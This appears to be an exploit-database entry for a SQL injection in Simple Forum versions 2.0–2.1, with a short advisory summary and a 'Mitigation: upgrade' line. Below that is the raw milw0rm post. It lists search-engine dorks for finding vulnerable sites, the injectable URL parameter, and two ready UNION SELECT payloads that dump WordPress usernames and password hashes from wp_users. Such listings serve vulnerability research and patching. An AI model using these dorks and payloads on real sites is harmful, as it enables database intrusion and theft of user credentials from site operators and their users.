Simple Forum Version 2.0-2.1(sf-forum)

vendor:

Simple Forum

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple Forum

Affected Version From: 2

Affected Version To: 2.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Simple Forum Version 2.0-2.1(sf-forum)

Simple Forum versions 2.0 and 2.1 are vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Upgrade to the latest version of Simple Forum.

Source

Exploit-DB raw data:

###############################################################
#
# Simple Forum Version 2.0-2.1(sf-forum)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################

DORKS 1 :

Simple Forum - Version 2.0 (Build 207)
Simple Forum - SÃ¼rÃ¼m 2.1 (Build 228)
Simple Forum - Version 2.1 (Build 236)

DORK 2 : allinurl: "sf-forum?forum"

################################################################
example :

http://www.xxx.com/sf-forum?forum=[exploit]

EXPLOIT 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

exploit 2 :

-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*

################################################################
# S@BUN               i AM NOT HACKER               S@BUN
################################################################

# milw0rm.com [2008-02-15]